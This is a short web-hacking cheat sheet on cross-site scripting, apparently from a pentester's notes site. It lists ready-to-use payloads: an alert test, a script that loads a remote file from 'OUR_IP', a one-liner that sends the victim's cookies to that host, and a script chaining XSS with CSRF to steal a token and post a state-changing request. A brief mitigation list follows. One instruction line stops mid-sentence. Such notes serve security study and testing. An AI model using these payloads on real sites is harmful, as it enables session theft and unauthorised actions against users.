search

Cross Site Scripting

Snippets of XSS stuff

hashtag
XSS

Basic XSS Payload

<script>alert(window.origin)</script>

Load remote script

<script src="http://OUR_IP/script.js"></script>

Send Cookie details to attacker server

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

hashtag
XSS + CSRF

Chaining XSS + CSRF to execute javascript

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/app/change-visibility',true);
req.send();
function handleResponse(d) {
    var token = this.responseText.match(/name="csrf" type="hidden" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/app/change-visibility', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    changeReq.send('csrf='+token+'&action=change');
};
</script>

Base64 encode the entire payload above and send with

hashtag
Mitigation

  • Sanitize inputs on the Front-end and Back-end

  • Validate inputs on the Front-end and Back-end

  • Output HTML Encoding

    • html entities

  • Server Configuration

    • XSS prevention headers X-XSS-Protection

    • Use Content-Security-Policy options like script-src="self" to only allow locally hosted scripts

    • Use HttpOnly and Secure cookie flags to prevent JavaScript from reading cookie values

  • WAF to detect and block XSS attacks

  • Same Origin Policy for Cross-Site. Does not work for the same site

PreviousSQL InjectionNextCommand Injection

Last updated